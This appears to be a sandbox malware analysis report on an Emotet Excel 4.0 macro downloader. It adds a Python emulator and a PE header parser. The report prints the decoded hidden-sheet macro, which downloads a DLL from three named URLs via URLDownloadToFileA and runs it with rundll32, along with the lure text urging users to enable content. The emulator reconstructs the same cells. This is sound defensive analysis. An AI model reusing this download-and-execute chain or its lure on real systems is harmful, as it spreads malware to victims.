Verdict Malicious
Classifications Downloader
Threat Names Emotet, Mal/Generic-S, Mal/HTMLGen-A

Remarks (3)

(0x0200000E): The overall sleep time of all monitored processes was truncated from "10 hours, 28 minutes, 39 seconds" to "20 seconds" to reveal dormant functionality.

(0x02000050): This analysis has been updated with the latest reputation and static analysis results from the original analysis with the ID #8537650.

(0x0200004A): 28 dumps were skipped because they exceeded the maximum dump size of 7 MB. The largest one was 95 MB.

File Name Category Type Verdict
C:\Users\kEecfMwgj\Desktop\bmxixqaylqt.xls Sample File Excel Document
malicious
MIME Type application/vnd.ms-excel
File Size 113.00 KB
MD5 20759385064298185538fe8560b6dd18
SHA1 50ca3dc590956809332b5b878c0ff213d81440a1
SHA256 7443d5335a207cca176825bd774a412e72882c815206c7f59ace1feb111bb4e9
SSDeep 3072:yKpb8rGYrMPe3q7Q0XV5xtezEsi8/dgQCyVEdBU6hubsll6UQjvxm:yKpb8rGYrMPe3q7Q0XV5xtuEsi8/dgbr
ImpHash -
File Reputation Information
Verdict
malicious
Names Mal/Generic-S
Office Information
Creator Админ (Cyrillic for "Admin", consistent with the ANSI_Cyrillic codepage below)
Last Modified By Admin
Create Time 2015-06-05 18:19:34+00:00
Modify Time 2022-01-11 08:18:37+00:00
Codepage ANSI_Cyrillic
Application Microsoft Excel
App Version 16.0
Document Security NONE
Titles Of Parts Sheet, Frb1, Gbi1, GTTTT
scale_crop False
shared_doc False
Controls (1)
CLSID Control Name Associated Vulnerability
{00020820-0000-0000-C000-000000000046} Excel97Sheet -
Excel 4.0 Macros (1)
Macro #1: GTTTT
Visibility State hidden
Triggers document:AUTO_OPEN
Labels AUTO_OPEN, FAFA, FDFD, FDFD1, FDFD2, FDFD6
In the submitted file only the FORMULA() chain below carries code. Each FORMULA(text, target) call concatenates fragments from the Frb1 and Gbi1 sheets and enters the result as the formula of its target cell (G16 to G28), so the download URLs and the command line do not exist in this file until the macro runs; the decoded cells appear in the re-saved copy further down.
G:14     =FORMULA()
         =FORMULA(Gbi1!T2,G16)
         =FORMULA(Frb1!P22&Frb1!H9&Frb1!L2&Frb1!B15&Frb1!B15&Frb1!P11&Gbi1!C5&Gbi1!E2&Gbi1!G5&Gbi1!H11&Gbi1!U6&Gbi1!C14,G18)
         =FORMULA(Frb1!P22&Frb1!J11&Frb1!B18&Frb1!P11&"FDFD"&Frb1!P9&Frb1!K9&Frb1!P7&Frb1!P19&Frb1!H9&Frb1!L2&Frb1!B15&Frb1!B15&Frb1!P11&Gbi1!C5&Gbi1!E2&Gbi1!G5&Gbi1!M5&Gbi1!U6&Gbi1!C14&Frb1!P13,G20)
         =FORMULA(Frb1!P22&Frb1!J11&Frb1!B18&Frb1!P11&"FDFD1"&Frb1!P9&Frb1!K9&Frb1!P7&Frb1!P19&Frb1!H9&Frb1!L2&Frb1!B15&Frb1!B15&Frb1!P11&Gbi1!C5&Gbi1!E2&Gbi1!G5&Gbi1!P9&Gbi1!U6&Gbi1!C14&Frb1!P13,G22)
         =FORMULA(Frb1!P22&Frb1!J11&Frb1!B18&Frb1!P11&"FDFD2"&Frb1!P9&Frb1!K9&Frb1!P7&Frb1!H9&Frb1!B15&Frb1!I17&Frb1!I3&Frb1!H13&Frb1!P11&Frb1!K9&Frb1!P13&Frb1!P7&Frb1!P13,G24)
         =FORMULA(Frb1!P22&Frb1!H13&Frb1!N4&Frb1!H13&Frb1!H9&Frb1!P11&Frb1!P15&Frb1!H9&Frb1!P20&Gbi1!Q4&Gbi1!S13&Gbi1!M2&Gbi1!R8&Frb1!P15&Frb1!P17&"FDFD6"&Frb1!P13,G26)
         =FORMULA(Frb1!P22&Frb1!G24&Frb1!H13&Frb1!I26&Frb1!E11&Frb1!G24&Frb1!K23&Frb1!P11&Frb1!P13,G28)
Extracted Image Texts (1)
Image 1: 0.png
THIS DOCUMENT IS ONLY AVAILABLE FOR DESKTOP OR LAPTOP VERSIONS OF MICROSOFT OFFICE EXCEL. Open the document in Microsoft Office. Previewing online is not available for protected documents. CLICK “ENABLE EDITING” FROM YELLOW BAR ABOVE Once you have enabled editing, please click “Enable Content” button
CFB Streams (3)
Name ID Size Actions
Root\Workbook 1 102.54 KB
Root\SummaryInformation 2 4.00 KB
Root\DocumentSummaryInformation 3 4.00 KB
c:\users\keecfmwgj\desktop\15eab100 Dropped File Excel Document
malicious
Also Known As c:\users\keecfmwgj\desktop\bmxixqaylqt.xls (Dropped File)
MIME Type application/vnd.ms-excel
File Size 113.50 KB
MD5 dbfe6b87a55b8e45be8770781a704711
SHA1 4dbed3a14da796f0a90b6c20d1fe68f2bd822a9d
SHA256 5968b1706ddb1f6d2fa8120cd03d84f10217c0c1a71b64d3ae9bffbbbb36c4c1
SSDeep 3072:Ck3hOdsylKlgxopeiBNhZFGzE+cL2kdAJuyVEdBU6hubsll6UQjvxy:Ck3hOdsylKlgxopeiBNhZF+E+W2kdAcR
ImpHash -
Office Information
Creator Админ (Cyrillic for "Admin")
Last Modified By kEecfMwgj (the sandbox user: this is the workbook as Excel re-saved it during the run, after the macro had executed)
Create Time 2015-06-05 18:19:34+00:00
Modify Time 2022-01-11 12:42:10+00:00
Codepage ANSI_Latin1
Application Microsoft Excel
App Version 16.0
Document Security NONE
Titles Of Parts Sheet, Frb1, Gbi1, GTTTT
scale_crop False
shared_doc False
Controls (1)
CLSID Control Name Associated Vulnerability
{00020820-0000-0000-C000-000000000046} Excel97Sheet -
Excel 4.0 Macros (1)
Macro #1: GTTTT
Visibility State hidden
Triggers document:AUTO_OPEN
Labels AUTO_OPEN, FAFA, FDFD, FDFD1, FDFD2, FDFD6
Cells G16 to G28 are populated only in this post-execution copy. FORMULA(text, target) enters text as the formula of the target cell, so the chain in G14 writes the real macro at run time from fragments spread over the Frb1 and Gbi1 sheets. Reading the decoded cells: G18 calls urlmon!URLDownloadToFileA directly through CALL(); the first character of the type string "JJCCBB" is the return type, a signed 32-bit integer, so a failed download comes back as a negative HRESULT. G20 and G22 test the previous attempt with IF(label<0, ...) and fall through to the next URL, and G24 closes the workbook once all three have failed. G26 runs the downloaded file with rundll32, which loads any PE regardless of the .ocx extension; the export name is supplied through the label FDFD6, which by the structure of the chain is the split string "D"&"l"&"lR"&"egister"&"Serve"&"r" assembled in G16. The downloaded DLL below does export DllRegisterServer.
G:14     =FORMULA()
         =FORMULA(Gbi1!T2,G16)
         =FORMULA(Frb1!P22&Frb1!H9&Frb1!L2&Frb1!B15&Frb1!B15&Frb1!P11&Gbi1!C5&Gbi1!E2&Gbi1!G5&Gbi1!H11&Gbi1!U6&Gbi1!C14,G18)
         =FORMULA(Frb1!P22&Frb1!J11&Frb1!B18&Frb1!P11&"FDFD"&Frb1!P9&Frb1!K9&Frb1!P7&Frb1!P19&Frb1!H9&Frb1!L2&Frb1!B15&Frb1!B15&Frb1!P11&Gbi1!C5&Gbi1!E2&Gbi1!G5&Gbi1!M5&Gbi1!U6&Gbi1!C14&Frb1!P13,G20)
         =FORMULA(Frb1!P22&Frb1!J11&Frb1!B18&Frb1!P11&"FDFD1"&Frb1!P9&Frb1!K9&Frb1!P7&Frb1!P19&Frb1!H9&Frb1!L2&Frb1!B15&Frb1!B15&Frb1!P11&Gbi1!C5&Gbi1!E2&Gbi1!G5&Gbi1!P9&Gbi1!U6&Gbi1!C14&Frb1!P13,G22)
         =FORMULA(Frb1!P22&Frb1!J11&Frb1!B18&Frb1!P11&"FDFD2"&Frb1!P9&Frb1!K9&Frb1!P7&Frb1!H9&Frb1!B15&Frb1!I17&Frb1!I3&Frb1!H13&Frb1!P11&Frb1!K9&Frb1!P13&Frb1!P7&Frb1!P13,G24)
         =FORMULA(Frb1!P22&Frb1!H13&Frb1!N4&Frb1!H13&Frb1!H9&Frb1!P11&Frb1!P15&Frb1!H9&Frb1!P20&Gbi1!Q4&Gbi1!S13&Gbi1!M2&Gbi1!R8&Frb1!P15&Frb1!P17&"FDFD6"&Frb1!P13,G26)
         =FORMULA(Frb1!P22&Frb1!G24&Frb1!H13&Frb1!I26&Frb1!E11&Frb1!G24&Frb1!K23&Frb1!P11&Frb1!P13,G28)
G:16     D"&"l"&"lR"&"egister"&"Serve"&"r
G:18     =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://gaidov.bg/wp-includes/Ug/","..\sun.ocx",0,0)
G:20     =IF(FDFD<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://studiokrishnaproduction.com/wp-includes/3mJ/","..\sun.ocx",0,0))
G:22     =IF(FDFD1<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://goodmarketinggroup.com/live_site/Y9cEk9QNlDUeg/","..\sun.ocx",0,0))
G:24     =IF(FDFD2<0,CLOSE(0),)
G:26     =EXEC("C:\Windows\SysWow64\rundll32.exe ..\sun.ocx,"&FDFD6)
G:28     =RETURN()
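To show how the chain above turns into the decoded cells and how the fallback logic behaves, here is a small emulator. It is an example added by the editor, not code from VMRay or from the sample: it parses the XLM subset these cells use (string literals, cell references, "&", comparisons, function calls), implements FORMULA(text, target) as "write text into the target cell", and replaces CALL("urlmon","URLDownloadToFileA",...) with a table of simulated HRESULTs, so nothing touches the network. The Frb1/Gbi1 fragment cells are not on this page; the fragments, the macro-sheet layout (G8 to G14) and the label-to-cell mapping in the code are constructed assumptions chosen so that the assembled formulas match cells G16 to G28 above. The URLs and the command line are the ones from the report.

```python
"""Emulate the FORMULA()/CALL()/IF()/EXEC() chain of the hidden GTTTT sheet, offline."""
import re

# Constructed workbook (assumption): the real Frb1/Gbi1 fragment cells are not on the page,
# so these fragments and the macro-sheet layout are made up to reproduce the decoded cells
# G16-G28 shown above. A leading apostrophe marks a text cell, as in Excel's UI.
SHEETS = {
    "Frb1": {"P22": "'=", "J11": "IF(", "B18": "<0, ", "P13": ")", "G24": "RETURN()",
             "H9": 'CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"', "P11": '","..\\sun.ocx",0,0)',
             "N4": 'EXEC("C:\\Windows\\SysWow64\\rundll32.exe ..\\sun.ocx,"&'},
    "Gbi1": {"T2": "'=\"D\"&\"l\"&\"lR\"&\"egister\"&\"Serve\"&\"r\"",
             "C5": "http://gaidov.bg/wp-includes/Ug/", "M5": "http://studiokrishnaproduction.com/wp-includes/3mJ/",
             "P9": "http://goodmarketinggroup.com/live_site/Y9cEk9QNlDUeg/"},
    "GTTTT": {"G8": "=FORMULA(Gbi1!T2,G16)",  # hidden macro sheet; AUTO_OPEN walks down column G
              "G9": "=FORMULA(Frb1!P22&Frb1!H9&Gbi1!C5&Frb1!P11,G18)",
              "G10": '=FORMULA(Frb1!P22&Frb1!J11&"FDFD"&Frb1!B18&Frb1!H9&Gbi1!M5&Frb1!P11&Frb1!P13,G20)',
              "G11": '=FORMULA(Frb1!P22&Frb1!J11&"FDFD1"&Frb1!B18&Frb1!H9&Gbi1!P9&Frb1!P11&Frb1!P13,G22)',
              "G12": '=FORMULA(Frb1!P22&Frb1!J11&"FDFD2"&Frb1!B18&"CLOSE(0),)",G24)',
              "G13": '=FORMULA(Frb1!P22&Frb1!N4&"FDFD6"&Frb1!P13,G26)',
              "G14": "=FORMULA(Frb1!P22&Frb1!G24,G28)"}}
LABELS = {"AUTO_OPEN": "G8", "FDFD": "G18", "FDFD1": "G20", "FDFD2": "G22", "FDFD6": "G16"}  # assumed

TOKEN = re.compile(r'\s+|"((?:[^"]|"")*)"|(-?\d+)|([A-Za-z_][\w.]*(?:![A-Z]{1,3}\d+)?)|([&<>=(),])|(.)')

def tokenize(src):
    out = []
    for m in TOKEN.finditer(src):
        s, n, name, op, bad = m.groups()
        if bad: raise ValueError(f"bad character {bad!r} in {src!r}")
        if s is not None: out.append(("str", s.replace('""', '"')))
        elif n is not None: out.append(("num", int(n)))
        elif name is not None: out.append(("name", name))  # cell ref, label or function name
        elif op is not None: out.append(("op", op))
    return out

class Parser:
    """Recursive descent over the XLM subset these cells use: literals, refs, '&', comparisons, calls."""
    def __init__(self, src): self.toks, self.i = tokenize(src), 0
    def peek(self): return self.toks[self.i] if self.i < len(self.toks) else ("eof", None)
    def take(self, want=None):
        tok, self.i = self.peek(), self.i + 1
        if want and tok != ("op", want): raise ValueError(f"expected {want!r}, got {tok}")
        return tok
    def expr(self):                               # comparison binds loosest: a&b<0 is (a&b)<0
        left = self.concat()
        if self.peek()[0] == "op" and self.peek()[1] in "<>=":
            return ("bin", self.take()[1], left, self.concat())
        return left
    def concat(self):                             # '&' chains are what assemble the hidden text
        node = self.primary()
        while self.peek() == ("op", "&"):
            self.take(); node = ("bin", "&", node, self.primary())
        return node
    def primary(self):
        kind, val = self.take()
        if kind in ("str", "num"): return (kind, val)
        if (kind, val) == ("op", "("): node = self.expr(); self.take(")"); return node
        if kind == "name" and self.peek() == ("op", "("):
            self.take("("); args = []
            while self.peek() != ("op", ")"):      # an empty argument, as in IF(c,x,), becomes None
                args.append(None if self.peek() == ("op", ",") else self.expr())
                if self.peek() == ("op", ","): self.take()
            self.take(")"); return ("call", val, args)
        if kind == "name": return ("ref", val)
        raise ValueError(f"unexpected token {kind} {val!r}")

def num(v): return int(v) if isinstance(v, (bool, int)) else 0   # FALSE/TRUE compare as 0/1

class Workbook:
    def __init__(self, sheets, labels, macro, download_results):
        self.sheets = {n: dict(c) for n, c in sheets.items()}
        self.labels, self.macro, self.download_results = labels, macro, download_results
        self.results, self.events, self.halted = {}, [], False
    def locate(self, name):                       # label or reference -> (sheet, address)
        sheet, _, addr = self.labels.get(name, name).rpartition("!")
        return sheet or self.macro, addr
    def value(self, name):
        sheet, addr = self.locate(name)
        raw = self.sheets[sheet].get(addr, "")
        if raw.startswith("'"): return raw[1:]    # text cell
        if not raw.startswith("="): return raw
        key = f"{sheet}!{addr}"                   # formula cell: its last computed value
        if key not in self.results: self.results[key] = self.eval(Parser(raw[1:]).expr())
        return self.results[key]
    def eval(self, node):
        kind = node[0]
        if kind in ("str", "num"): return node[1]
        if kind == "ref": return self.value(node[1])
        if kind == "bin":
            _, op, l, r = node; l, r = self.eval(l), self.eval(r)
            return f"{l}{r}" if op == "&" else {"<": num(l) < num(r), ">": num(l) > num(r), "=": num(l) == num(r)}[op]
        _, fn, args = node
        if fn == "FORMULA":                       # FORMULA(text, target): enter text as target's formula
            sheet, addr = self.locate(args[1][1])
            self.sheets[sheet][addr] = str(self.eval(args[0])); self.results.pop(f"{sheet}!{addr}", None)
            return True
        if fn == "IF":                            # branches evaluate lazily, as in Excel
            branch = args[1] if self.eval(args[0]) else (args[2] if len(args) > 2 else None)
            return self.eval(branch) if branch is not None else False
        a = [self.eval(x) if x is not None else None for x in args]
        if fn == "CALL" and a[1] == "URLDownloadToFileA":   # CALL(dll, func, "JJCCBB", pCaller, url, path, 0, 0)
            hresult = self.download_results.get(a[4], -1)  # unlisted URL: simulate a failed download
            self.events.append(("download", a[4], a[5], hresult)); return hresult
        if fn == "EXEC": self.events.append(("exec", a[0])); return 1
        if fn in ("CLOSE", "RETURN", "HALT"):
            self.events.append((fn.lower(), *a)); self.halted = True; return True
        raise NotImplementedError(f"XLM function {fn} is not emulated")
    def run(self, label, max_rows=256):
        """Execute cells top-down from `label`, skipping blanks, until RETURN/CLOSE/HALT."""
        col, row = re.match(r"([A-Z]+)(\d+)$", self.locate(label)[1]).groups()
        for r in range(int(row), int(row) + max_rows):
            if self.halted: break
            raw = self.sheets[self.macro].get(f"{col}{r}", "")
            if raw.startswith("="): self.results[f"{self.macro}!{col}{r}"] = self.eval(Parser(raw[1:]).expr())
        return self
    def iocs(self):
        """Indicators from the path taken, plus every URL sitting in the decoded cells."""
        decoded = "\n".join(self.sheets[self.macro].values())
        return {"urls": sorted(set(re.findall(r"https?://[^\s\"']+", decoded))),
                "downloads": [e[1:] for e in self.events if e[0] == "download"],
                "commands": [e[1] for e in self.events if e[0] == "exec"]}

def emulate(download_results=None):
    """Run AUTO_OPEN; download_results maps URL -> HRESULT to return (0 = success)."""
    return Workbook(SHEETS, LABELS, "GTTTT", download_results or {}).run("AUTO_OPEN")
```

emulate() with the default table, where every download fails, walks all three URLs and ends in CLOSE(0); that is the run to use when enumerating infrastructure. emulate({first_url: 0}) takes the success path and yields the rundll32 command line instead. iocs() additionally scans the decoded cells, so a URL the chosen path never reached is still reported.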
Extracted Image Texts (1)
Image 1: 0.png
THIS DOCUMENT IS ONLY AVAILABLE FOR DESKTOP OR LAPTOP VERSIONS OF MICROSOFT OFFICE EXCEL. Open the document in Microsoft Office. Previewing online is not available for protected documents. CLICK “ENABLE EDITING” FROM YELLOW BAR ABOVE Once you have enabled editing, please click “Enable Content” button
CFB Streams (3)
Name ID Size Actions
Root\Workbook 1 103.14 KB
Root\SummaryInformation 2 4.00 KB
Root\DocumentSummaryInformation 3 4.00 KB
Extracted URLs (3)
URL Reputation
[URL not captured in this export] malicious
[URL not captured in this export] malicious
[URL not captured in this export] malicious
The three entries match in number the download URLs carried in cells G18, G20 and G22 above; all three are rated malicious.
QKehbVshDH.dll Downloaded File Binary
malicious
Also Known As ..\sun.ocx (Downloaded File)
C:\Users\kEecfMwgj\sun.ocx (Downloaded File)
Parent File analysis.pcap
MIME Type application/vnd.microsoft.portable-executable
File Size 413.54 KB
MD5 0c11b35dd313bc03f9a40ef4236bce92
SHA1 59cd1d20af8bc85c65579f00c40f70aae8aa124c
SHA256 a80843c86ccdbd0e03670ba1205da9a0a0acce34f78b0bf49744edf4364153db
SSDeep 6144:b8OPcQEP/iCaOkKOrjLC43u48PrkFsjhUnyi+u54vIknUGhwG/K6786TEnCAIpiG:b8ScQEPKCr/O2W4Ssjvu54wMbGg
ImpHash b6ba6bb0b5e8761cdb5e532a9adacfc0
File Reputation Information
Verdict
malicious
Names Mal/Generic-S
PE Information
Image Base 0x6ab00000
Entry Point 0x6ab01470
Size Of Code 0x17600
Size Of Initialized Data 0x44800
Size Of Uninitialized Data 0x600
File Type DLL
Subsystem Windows CUI (console)
Machine Type i386
Compile Timestamp 2022-01-10 15:42:05+00:00
Sections (17)
The alignment field of IMAGE_SECTION_HEADER.Characteristics (bits 20 to 23) is a single 4-bit value, not a set of flags. The tool that produced this listing tested every IMAGE_SCN_ALIGN_* constant against it with a bitwise AND and therefore printed a dozen overlapping alignment names for each section; the table below shows the one alignment each section actually declares. Section names of the form /N are offsets into the COFF string table, which is how GNU ld stores names longer than eight characters (typically .debug_* sections), another sign of a MinGW/GCC build. .data (0x27e00 bytes of raw data, entropy 7.55) is the largest section and its content is close to random.
Name Virtual Address Virtual Size Raw Data Size Raw Data Offset Flags Entropy
.text 0x6ab01000 0x1747c 0x17600 0x600 IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ 6.2
.data 0x6ab19000 0x27ce0 0x27e00 0x17c00 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE 7.55
.rdata 0x6ab41000 0x26dc 0x2800 0x3fa00 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_MEM_READ 5.5
.bss 0x6ab44000 0x46c 0x0 0x0 IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE 0.0
.edata 0x6ab45000 0x12d 0x200 0x42200 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_MEM_READ 3.33
.idata 0x6ab46000 0xb18 0xc00 0x42400 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE 4.78
.CRT 0x6ab47000 0x30 0x200 0x43000 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE 0.27
.tls 0x6ab48000 0x20 0x200 0x43200 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE 0.29
.reloc 0x6ab49000 0x19c4 0x1a00 0x43400 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ 6.71
/4 0x6ab4b000 0x238 0x400 0x44e00 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ 1.49
/19 0x6ab4c000 0xa7ba 0xa800 0x45200 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ 6.16
/31 0x6ab57000 0x197f 0x1a00 0x4fa00 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ 4.64
/45 0x6ab59000 0x192e 0x1a00 0x51400 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ 5.87
/57 0x6ab5b000 0xa6c 0xc00 0x52e00 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ 4.47
/70 0x6ab5c000 0x13a 0x200 0x53a00 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ 3.5
/81 0x6ab5d000 0x18f4 0x1a00 0x53c00 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ 3.41
/92 0x6ab5f000 0x5c0 0x600 0x55600 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ 3.09
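A Characteristics word carries at most one alignment value, in bits 20 to 23; a decoder that tests each IMAGE_SCN_ALIGN_* constant with a bitwise AND prints a dozen overlapping names per section, which is how the flag column of this report was originally generated. The following is an added example, not VMRay code: a minimal section-table parser that decodes Characteristics as the PE/COFF specification defines it, a naive_decode() that reproduces the report's output for comparison, and the Shannon entropy the last column reports. The header blob it parses is constructed (an assumption, not bytes from the sample) from the .text and .data values above with image base 0x6ab00000; it carries no section bodies, so the entropy column comes out 0.0 for it.

```python
"""Decode IMAGE_SECTION_HEADER.Characteristics correctly, and reproduce the report's mis-decoding."""
import math
import struct
from collections import Counter

# Single-bit flags of Characteristics (PE/COFF specification). The alignment field is NOT
# among them: bits 20-23 hold one 4-bit number n meaning an alignment of 2**(n-1) bytes.
BIT_FLAGS = {
    0x00000020: "IMAGE_SCN_CNT_CODE",
    0x00000040: "IMAGE_SCN_CNT_INITIALIZED_DATA",
    0x00000080: "IMAGE_SCN_CNT_UNINITIALIZED_DATA",
    0x02000000: "IMAGE_SCN_MEM_DISCARDABLE",
    0x04000000: "IMAGE_SCN_MEM_NOT_CACHED",
    0x08000000: "IMAGE_SCN_MEM_NOT_PAGED",
    0x10000000: "IMAGE_SCN_MEM_SHARED",
    0x20000000: "IMAGE_SCN_MEM_EXECUTE",
    0x40000000: "IMAGE_SCN_MEM_READ",
    0x80000000: "IMAGE_SCN_MEM_WRITE",
}
ALIGN_MASK, ALIGN_SHIFT = 0x00F00000, 20

def decode_characteristics(ch):
    """Flag names in the report's order: CNT_*, the single alignment value, then MEM_*."""
    names = [name for bit, name in BIT_FLAGS.items() if ch & bit and bit < 0x100]
    n = (ch & ALIGN_MASK) >> ALIGN_SHIFT
    if n:                                          # 0 means "not specified", the usual case in images
        names.append(f"IMAGE_SCN_ALIGN_{1 << (n - 1)}BYTES")
    return names + [name for bit, name in BIT_FLAGS.items() if ch & bit and bit >= 0x100]

def naive_decode(ch):
    """What the report did: test every ALIGN_* constant with '&' as if it were an independent bit."""
    names = [name for bit, name in BIT_FLAGS.items() if ch & bit and bit < 0x100]
    names += [f"IMAGE_SCN_ALIGN_{1 << (n - 1)}BYTES" for n in range(1, 15) if ch & (n << ALIGN_SHIFT)]
    if ch & ALIGN_MASK:
        names.append("IMAGE_SCN_ALIGN_MASK")
    return names + [name for bit, name in BIT_FLAGS.items() if ch & bit and bit >= 0x100]

SECTION_HEADER = struct.Struct("<8sIIIIIIHHI")    # 40-byte IMAGE_SECTION_HEADER
COFF_HEADER = struct.Struct("<HHIIIHH")           # Machine ... SizeOfOptionalHeader, Characteristics

def entropy(data):
    """Shannon entropy in bits per byte: 0.0 for identical bytes, 8.0 for a uniform distribution."""
    if not data:
        return 0.0
    return -sum(c / len(data) * math.log2(c / len(data)) for c in Counter(data).values())

def section_table(pe, image_base=0):
    """Walk the COFF section table of a PE image; VAs are rebased to image_base as the report does."""
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    _, nsections, _, _, _, opt_size, _ = COFF_HEADER.unpack_from(pe, e_lfanew + 4)
    off = e_lfanew + 4 + COFF_HEADER.size + opt_size
    for i in range(nsections):
        (name, vsize, va, raw_size, raw_off,
         _, _, _, _, ch) = SECTION_HEADER.unpack_from(pe, off + i * SECTION_HEADER.size)
        yield {"name": name.rstrip(b"\0").decode("latin-1"), "va": image_base + va, "vsize": vsize,
               "raw_size": raw_size, "raw_off": raw_off, "flags": decode_characteristics(ch),
               "entropy": round(entropy(pe[raw_off:raw_off + raw_size]), 2)}

def build_test_image():
    """Constructed header-only blob (assumption): DOS stub, COFF header with no optional header,
    and two section headers carrying the .text/.data values from the report above."""
    dos = b"MZ" + bytes(0x3A) + struct.pack("<I", 0x40)                     # e_lfanew = 0x40
    coff = b"PE\0\0" + COFF_HEADER.pack(0x14C, 2, 0, 0, 0, 0, 0x2102)      # i386, 2 sections, DLL
    hdrs = SECTION_HEADER.pack(b".text", 0x1747C, 0x1000, 0x17600, 0x600, 0, 0, 0, 0, 0x60500060)
    hdrs += SECTION_HEADER.pack(b".data", 0x27CE0, 0x19000, 0x27E00, 0x17C00, 0, 0, 0, 0, 0xC0600040)
    return dos + coff + hdrs

if __name__ == "__main__":
    for sec in section_table(build_test_image(), 0x6AB00000):
        print(sec["name"], hex(sec["va"]), ", ".join(sec["flags"]), sec["entropy"])
    print("report-style:", ", ".join(naive_decode(0x60500060)))
```

For .text the naive decoder emits exactly the sixteen names the report printed, including IMAGE_SCN_ALIGN_MASK, while the correct decoder reduces that to IMAGE_SCN_ALIGN_16BYTES. To apply it to the real DLL, pass the file bytes to section_table() with the image base from the PE Information block.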
Imports (3)
KERNEL32.dll (61)
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
AddAtomA - 0x6ab461dc 0x46050 0x42450 0x3
CloseHandle - 0x6ab461e0 0x46054 0x42454 0x53
CreateEventA - 0x6ab461e4 0x46058 0x42458 0x84
CreateMutexA - 0x6ab461e8 0x4605c 0x4245c 0x9e
CreateSemaphoreA - 0x6ab461ec 0x46060 0x42460 0xad
DeleteCriticalSection - 0x6ab461f0 0x46064 0x42464 0xd4
DuplicateHandle - 0x6ab461f4 0x46068 0x42468 0xea
EnterCriticalSection - 0x6ab461f8 0x4606c 0x4246c 0xef
FindAtomA - 0x6ab461fc 0x46070 0x42470 0x12e
FreeLibrary - 0x6ab46200 0x46074 0x42474 0x164
GetAtomNameA - 0x6ab46204 0x46078 0x42478 0x170
GetCurrentProcess - 0x6ab46208 0x4607c 0x4247c 0x1c4
GetCurrentProcessId - 0x6ab4620c 0x46080 0x42480 0x1c5
GetCurrentThread - 0x6ab46210 0x46084 0x42484 0x1c8
GetCurrentThreadId - 0x6ab46214 0x46088 0x42488 0x1c9
GetHandleInformation - 0x6ab46218 0x4608c 0x4248c 0x200
GetLastError - 0x6ab4621c 0x46090 0x42490 0x203
GetNativeSystemInfo - 0x6ab46220 0x46094 0x42494 0x225
GetProcAddress - 0x6ab46224 0x46098 0x42498 0x245
GetProcessAffinityMask - 0x6ab46228 0x4609c 0x4249c 0x246
GetProcessHeap - 0x6ab4622c 0x460a0 0x424a0 0x24a
GetSystemTimeAsFileTime - 0x6ab46230 0x460a4 0x424a4 0x27b
GetThreadContext - 0x6ab46234 0x460a8 0x424a8 0x289
GetThreadPriority - 0x6ab46238 0x460ac 0x424ac 0x291
GetTickCount - 0x6ab4623c 0x460b0 0x424b0 0x297
HeapAlloc - 0x6ab46240 0x460b4 0x424b4 0x2d0
HeapFree - 0x6ab46244 0x460b8 0x424b8 0x2d6
InitializeCriticalSection - 0x6ab46248 0x460bc 0x424bc 0x2eb
InterlockedCompareExchange - 0x6ab4624c 0x460c0 0x424c0 0x2f2
InterlockedDecrement - 0x6ab46250 0x460c4 0x424c4 0x2f3
InterlockedExchange - 0x6ab46254 0x460c8 0x424c8 0x2f4
InterlockedExchangeAdd - 0x6ab46258 0x460cc 0x424cc 0x2f5
InterlockedIncrement - 0x6ab4625c 0x460d0 0x424d0 0x2f7
IsBadReadPtr - 0x6ab46260 0x460d4 0x424d4 0x2ff
LeaveCriticalSection - 0x6ab46264 0x460d8 0x424d8 0x326
